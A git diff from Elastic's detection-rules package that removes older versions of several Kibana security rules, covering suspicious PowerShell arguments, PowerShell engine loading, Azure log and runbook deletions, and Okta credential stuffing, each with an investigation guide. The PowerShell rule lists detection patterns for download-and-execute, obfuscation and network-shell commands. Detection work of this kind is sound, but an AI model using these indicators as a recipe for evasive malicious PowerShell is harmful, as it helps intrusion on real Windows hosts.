a/packages/security_detection_engine/kibana/security_rule/83bf249e-4348-47ba-9741-1202a09556ad_206.json b/packages/security_detection_engine/kibana/security_rule/83bf249e-4348-47ba-9741-1202a09556ad_206.json deleted file mode 100644 index 782b5fabf5b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/83bf249e-4348-47ba-9741-1202a09556ad_206.json +++ /dev/null @@ -1,121 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the execution of PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell.", - "from": "now-9m", - "index": [ - "logs-crowdstrike.fdr*", - "logs-m365_defender.event-*", - "logs-sentinel_one_cloud_funnel.*", - "logs-system.security*", - "logs-windows.forwarded*", - "logs-windows.sysmon_operational-*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Suspicious Windows Powershell Arguments", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious Windows Powershell Arguments\n\nPowerShell is a powerful scripting language and command-line shell used for task automation and configuration management in Windows environments. Adversaries exploit PowerShell's capabilities to execute malicious scripts, download payloads, and obfuscate commands. The detection rule identifies unusual PowerShell arguments indicative of such abuse, focusing on patterns like encoded commands, suspicious downloads, and obfuscation techniques, thereby flagging potential threats for further investigation.\n\n### Possible investigation steps\n\n- Review the process command line and arguments to identify any encoded or obfuscated content, such as Base64 strings or unusual character sequences, which may indicate malicious intent.\n- Check the parent process of the PowerShell execution, especially if it is explorer.exe or cmd.exe, to determine if the PowerShell instance was launched from a suspicious or unexpected source.\n- Investigate any network activity associated with the PowerShell process, particularly looking for connections to known malicious domains or IP addresses, or the use of suspicious commands like DownloadFile or DownloadString.\n- Examine the user account associated with the PowerShell execution to determine if it aligns with expected behavior or if it might be compromised.\n- Correlate the event with other security alerts or logs from the same host or user to identify patterns or additional indicators of compromise.\n- Assess the risk and impact of the detected activity by considering the context of the environment, such as the presence of sensitive data or critical systems that might be affected.\n\n### False positive analysis\n\n- Legitimate administrative scripts may use encoded commands for obfuscation to protect sensitive data. Review the script's source and purpose to determine if it is authorized. If confirmed, add the script's hash or specific command pattern to an allowlist.\n- Automated software deployment tools might use PowerShell to download and execute scripts from trusted internal sources. Verify the source and destination of the download. If legitimate, exclude the specific tool or process from the detection rule.\n- System maintenance tasks often involve PowerShell scripts that manipulate files or system settings. Identify routine maintenance scripts and exclude their specific command patterns or file paths from triggering the rule.\n- Security software may use PowerShell for scanning or remediation tasks, which can mimic suspicious behavior. Confirm the software's legitimacy and add its processes to an exception list to prevent false alerts.\n- Developers might use PowerShell for testing or development purposes, which can include obfuscation techniques. Validate the developer's activities and exclude their specific development environments or scripts from the rule.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further spread or communication with potential command and control servers.\n- Terminate any suspicious PowerShell processes identified by the detection rule to halt ongoing malicious activities.\n- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious payloads or scripts.\n- Review and clean up any unauthorized changes to system configurations or scheduled tasks that may have been altered by the malicious PowerShell activity.\n- Restore any affected files or system components from known good backups to ensure system integrity and functionality.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are compromised.\n- Implement additional monitoring and logging for PowerShell activities across the network to enhance detection of similar threats in the future.", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"powershell.exe\" and\n (\n process.command_line :\n (\n \"*^*^*^*^*^*^*^*^*^*\",\n \"*`*`*`*`*\",\n \"*+*+*+*+*+*+*\",\n \"*[char[]](*)*-join*\",\n \"*Base64String*\",\n \"*[*Convert]*\",\n \"*.Compression.*\",\n \"*-join($*\",\n \"*.replace*\",\n \"*MemoryStream*\",\n \"*WriteAllBytes*\",\n \"* -enc *\",\n \"* -ec *\",\n \"* /e *\",\n \"* /enc *\",\n \"* /ec *\",\n \"*WebClient*\",\n \"*DownloadFile*\",\n \"*DownloadString*\",\n \"* iex*\",\n \"* iwr*\",\n \"*Reflection.Assembly*\",\n \"*Assembly.GetType*\",\n \"*$env:temp\\\\*start*\",\n \"*powercat*\",\n \"*nslookup -q=txt*\",\n \"*$host.UI.PromptForCredential*\",\n \"*Net.Sockets.TCPClient*\",\n \"*curl *;Start*\",\n \"powershell.exe \\\"<#*\",\n \"*ssh -p *\",\n \"*http*|iex*\",\n \"*@SSL\\\\DavWWWRoot\\\\*.ps1*\",\n \"*.lnk*.Seek(0x*\",\n \"*[string]::join(*\",\n \"*[Array]::Reverse($*\",\n \"* hidden $(gc *\",\n \"*=wscri& set*\",\n \"*http'+'s://*\",\n \"*.content|i''Ex*\",\n \"*//:sptth*\",\n \"*//:ptth*\",\n \"*$*=Get-Content*AppData*.SubString(*$*\",\n \"*=cat *AppData*.substring(*);*$*\"\n ) or\n\n (process.args : \"-c\" and process.args : \"&{'*\") or\n\n (process.args : \"-Outfile\" and process.args : \"Start*\") or\n\n (process.args : \"-bxor\" and process.args : \"0x*\") or\n\n process.args : \"$*$*;set-alias\" or\n\n (process.parent.name : (\"explorer.exe\", \"cmd.exe\") and\n process.command_line : (\"*-encodedCommand*\", \"*Invoke-webrequest*\", \"*WebClient*\", \"*Reflection.Assembly*\"))\n )\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - }, - { - "package": "system", - "version": "^2.0.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.0.0" - }, - { - "package": "m365_defender", - "version": "^3.0.0" - }, - { - "package": "crowdstrike", - "version": "^1.1.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.command_line", - "type": "wildcard" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "83bf249e-4348-47ba-9741-1202a09556ad", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Windows Security Event Logs", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 206 - }, - "id": "83bf249e-4348-47ba-9741-1202a09556ad_206", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_211.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_211.json deleted file mode 100644 index d777c1b8c0c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_211.json +++ /dev/null @@ -1,109 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "logs-endpoint.events.library-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Suspicious PowerShell Engine ImageLoad", - "new_terms_fields": [ - "host.id", - "process.executable", - "user.id" - ], - "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "host.os.type:windows and event.category:library and \n dll.name:(\"System.Management.Automation.dll\" or \"System.Management.Automation.ni.dll\") and \n not (\n process.code_signature.subject_name:(\"Microsoft Corporation\" or \"Microsoft Dynamic Code Publisher\" or \"Microsoft Windows\") and process.code_signature.trusted:true and not process.name.caseless:(\"regsvr32.exe\" or \"rundll32.exe\")\n ) and \n not (\n process.executable.caseless:(C\\:\\\\Program*Files*\\(x86\\)\\\\*.exe or C\\:\\\\Program*Files\\\\*.exe) and\n process.code_signature.trusted:true\n ) and \n not (\n process.executable.caseless: C\\:\\\\Windows\\\\Lenovo\\\\*.exe and process.code_signature.subject_name:\"Lenovo\" and \n process.code_signature.trusted:true\n ) and \n not (\n process.executable.caseless: \"C:\\\\ProgramData\\\\chocolatey\\\\choco.exe\" and\n process.code_signature.subject_name:\"Chocolatey Software, Inc.\" and process.code_signature.trusted:true\n ) and not process.executable.caseless : \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n", - "references": [ - "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "dll.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.code_signature.subject_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.code_signature.trusted", - "type": "boolean" - }, - { - "ecs": false, - "name": "process.executable.caseless", - "type": "unknown" - }, - { - "ecs": false, - "name": "process.name.caseless", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 211 - }, - "id": "852c1f19-68e8-43a6-9dce-340771fe1be3_211", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_103.json b/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_103.json deleted file mode 100644 index bf1ef36138d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/8b64d36a-1307-4b2e-a77b-a0027e4d27c8_103.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies when events are deleted in Azure Kubernetes. Kubernetes events are objects that log any state changes. Example events are a container creation, an image pull, or a pod scheduling on a node. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", - "false_positives": [ - "Events deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Kubernetes Events Deleted", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Kubernetes Events Deleted\n\nAzure Kubernetes Service (AKS) manages containerized applications using Kubernetes, which logs events like state changes. These logs are crucial for monitoring and troubleshooting. Adversaries may delete these logs to hide their tracks, impairing defenses. The detection rule identifies such deletions by monitoring specific Azure activity logs, flagging successful deletion operations to alert security teams of potential evasion tactics.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by checking for the operation name \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE\" and ensure the event outcome is marked as \"Success\".\n- Identify the user or service principal responsible for the deletion by examining the associated identity information in the activity logs.\n- Investigate the timeline of events leading up to and following the deletion to identify any suspicious activities or patterns, such as unauthorized access attempts or configuration changes.\n- Check for any other related alerts or anomalies in the Azure environment that might indicate a broader attack or compromise.\n- Assess the impact of the deleted events by determining which Kubernetes resources or operations were affected and if any critical logs were lost.\n- Review access controls and permissions for the user or service principal involved to ensure they align with the principle of least privilege and adjust if necessary.\n- Consider implementing additional monitoring or alerting for similar deletion activities to enhance detection and response capabilities.\n\n### False positive analysis\n\n- Routine maintenance activities by authorized personnel may trigger deletion events. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks.\n- Automated scripts or tools used for log rotation or cleanup might delete events as part of their normal operation. Identify these scripts and exclude their activity from triggering alerts by whitelisting their associated service accounts or IP addresses.\n- Misconfigured applications or services that inadvertently delete logs can cause false positives. Review application configurations and adjust them to prevent unnecessary deletions, and exclude these applications from alerts if they are verified as non-threatening.\n- Test environments often generate log deletions during setup or teardown processes. Exclude these environments from monitoring or create specific rules that differentiate between production and test environments to avoid unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure Kubernetes cluster to prevent further unauthorized access or tampering with logs.\n- Conduct a thorough review of recent activity logs and access permissions for the affected cluster to identify any unauthorized access or privilege escalation.\n- Restore deleted Kubernetes events from backups or snapshots if available, to ensure continuity in monitoring and auditing.\n- Implement stricter access controls and audit logging for Kubernetes event deletion operations to prevent unauthorized deletions in the future.\n- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation.\n- Escalate the incident to the incident response team if there is evidence of broader compromise or if the deletion is part of a larger attack campaign.\n- Review and update incident response plans to incorporate lessons learned from this event, ensuring quicker detection and response to similar threats in the future.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE\" and\nevent.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "8b64d36a-1307-4b2e-a77b-a0027e4d27c8", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Log Auditing", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "8b64d36a-1307-4b2e-a77b-a0027e4d27c8_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_103.json b/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_103.json deleted file mode 100644 index 9dfed2fa875..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/8ddab73b-3d15-4e5d-9413-47f05553c1d7_103.json +++ /dev/null @@ -1,75 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Automation Runbook Deleted", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Automation Runbook Deleted\n\nAzure Automation Runbooks automate repetitive tasks in cloud environments, enhancing operational efficiency. Adversaries may exploit this by deleting runbooks to disrupt operations or conceal malicious activities. The detection rule monitors Azure activity logs for successful runbook deletions, signaling potential defense evasion tactics, and alerts analysts to investigate further.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by checking the operation name \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE\" and ensure the event outcome is marked as Success.\n- Identify the user or service principal responsible for the deletion by examining the associated user identity information in the activity logs.\n- Investigate the timeline of events leading up to and following the runbook deletion to identify any suspicious activities or patterns, such as unauthorized access attempts or changes to other resources.\n- Check for any recent modifications or unusual activities in the affected Azure Automation account to determine if there are other signs of compromise or tampering.\n- Assess the impact of the deleted runbook on business operations and determine if any critical automation processes were disrupted.\n- If applicable, review any available backup or version history of the deleted runbook to restore it and mitigate operational disruptions.\n\n### False positive analysis\n\n- Routine maintenance activities by IT staff may lead to legitimate runbook deletions. To manage this, create exceptions for known maintenance periods or specific user accounts responsible for these tasks.\n- Automated scripts or third-party tools that manage runbooks might trigger deletions as part of their normal operation. Identify these tools and exclude their activity from alerts by filtering based on their service accounts or IP addresses.\n- Organizational policy changes or cloud environment restructuring can result in planned runbook deletions. Document these changes and adjust the detection rule to exclude these events by correlating with change management records.\n- Test environments often involve frequent creation and deletion of runbooks. Exclude these environments from alerts by using tags or specific resource group identifiers associated with non-production environments.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure Automation account to prevent further unauthorized deletions or modifications of runbooks.\n- Review the Azure activity logs to identify the user or service principal responsible for the deletion and revoke their access if unauthorized.\n- Restore the deleted runbook from backups or version control if available, ensuring that the restored version is free from any malicious modifications.\n- Conduct a security review of all remaining runbooks to ensure they have not been tampered with or contain malicious code.\n- Implement stricter access controls and auditing for Azure Automation accounts, ensuring that only authorized personnel have the ability to delete runbooks.\n- Escalate the incident to the security operations team for further investigation and to determine if additional malicious activities have occurred.\n- Enhance monitoring and alerting for similar activities by integrating additional context or indicators from the MITRE ATT&CK framework related to defense evasion tactics.", - "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE\" and\n event.outcome:(Success or success)\n", - "references": [ - "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", - "https://github.com/hausec/PowerZure", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "8ddab73b-3d15-4e5d-9413-47f05553c1d7", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "8ddab73b-3d15-4e5d-9413-47f05553c1d7_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_204.json b/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_204.json deleted file mode 100644 index bfd05e9980d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_204.json +++ /dev/null @@ -1,78 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts.", - "false_positives": [ - "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", - "Shared systems such as Kiosks and conference room computers may be used by multiple users." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Okta User Authentication Events with Client Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Okta User Authentication Events with Client Address\n\nThis rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack.\n\n#### Possible investigation steps:\nSince this is an ES|QL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy.\n - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying.\n- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful.\n - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.\n- Examine the `okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "FROM logs-okta*\n| WHERE\n event.dataset == \"okta.system\"\n AND (event.action == \"user.session.start\" OR event.action RLIKE \"user\\\\.authentication(.*)\")\n AND okta.outcome.reason == \"INVALID_CREDENTIALS\"\n| KEEP okta.client.ip, okta.actor.alternate_id, okta.actor.id, event.action, okta.outcome.reason\n| STATS\n source_auth_count = COUNT_DISTINCT(okta.actor.id)\n BY okta.client.ip, okta.actor.alternate_id\n| WHERE\n source_auth_count > 5\n| SORT\n source_auth_count DESC\n", - "references": [ - "https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "risk_score": 21, - "rule_id": "94e734c0-2cda-11ef-84e1-f661ea17fbce", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - }, - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 204 - }, - "id": "94e734c0-2cda-11ef-84e1-f661ea17fbce_204", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json index cdab09de63e..df058ebf77b 100644 --- a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json +++ b/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json @@ -23,6 +23,12 @@ "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" ], + "related_integrations": [ + { + "package": "okta", + "version": "^3.0.0" + } + ], "risk_score": 21, "rule_id": 